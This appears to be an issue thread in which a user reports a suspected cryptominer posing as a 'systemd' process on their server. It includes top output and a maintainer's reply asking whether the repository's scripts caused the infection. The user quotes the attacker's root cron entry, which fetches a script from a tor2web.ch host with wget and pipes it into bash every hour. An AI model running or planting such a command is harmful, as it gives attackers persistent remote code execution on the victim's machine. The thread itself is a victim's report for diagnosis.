suspicious website tor2web.ch?

[Folyd]

Hi, I found a suspicious website tor2web.ch which was disguised as a fake systemd process running 100% CPU. I don't know what the fake process actually do, probably mining.

Here is the top result:

top - 16:11:33 up 349 days,  9:30,  3 users,  load average: 1.12, 1.12, 1.13
Tasks: 128 total,   2 running, 126 sleeping,   0 stopped,   0 zombie
%Cpu(s):100.0 us,  0.0 sy,  0.0 ni,  0.0 id,  0.0 wa,  0.0 hi,  0.0 si,  0.0 st
KiB Mem:   2049904 total,  1221080 used,   828824 free,   114388 buffers
KiB Swap:        0 total,        0 used,        0 free.   152204 cached Mem

  PID USER      PR  NI    VIRT    RES    SHR S %CPU %MEM     TIME+ COMMAND
12379 root      20   0   46132    200      0 S 98.2  0.0 113787:55 systemd
 8198 root      20   0   22348   1844    736 S  0.3  0.1   1193:06 nload
22853 root      20   0   22224   1784    664 S  0.3  0.1 462:12.66 nload
23606 ubuntu    20   0   30348   7208    668 S  0.3  0.4 246:54.79 tmux
25350 root      20   0   24924   1640   1172 R  0.3  0.1   0:00.09 top
25404 root      20   0  102356   3816   2764 S  0.3  0.2   0:00.01 sshd
27601 root      20   0   47212  23992    668 S  0.3  1.2 241:26.20 tmux

Here is the cron task which runs wget to obtain the shell script then run in the background. However, the link not available anymore.

MAILTO=""
5 * * * * root wget -qO- -U- httpsxztdjm2vrpw.tor2web.ch/systemd|bash

[alectrocute]

WTF.

Yup, this is probably mining. Did you receive this process on your machine as a result of installing the scripts in this repo?

If so, this needs to be reported and rectified. I know it’s been over a year, but let me know.

@Folyd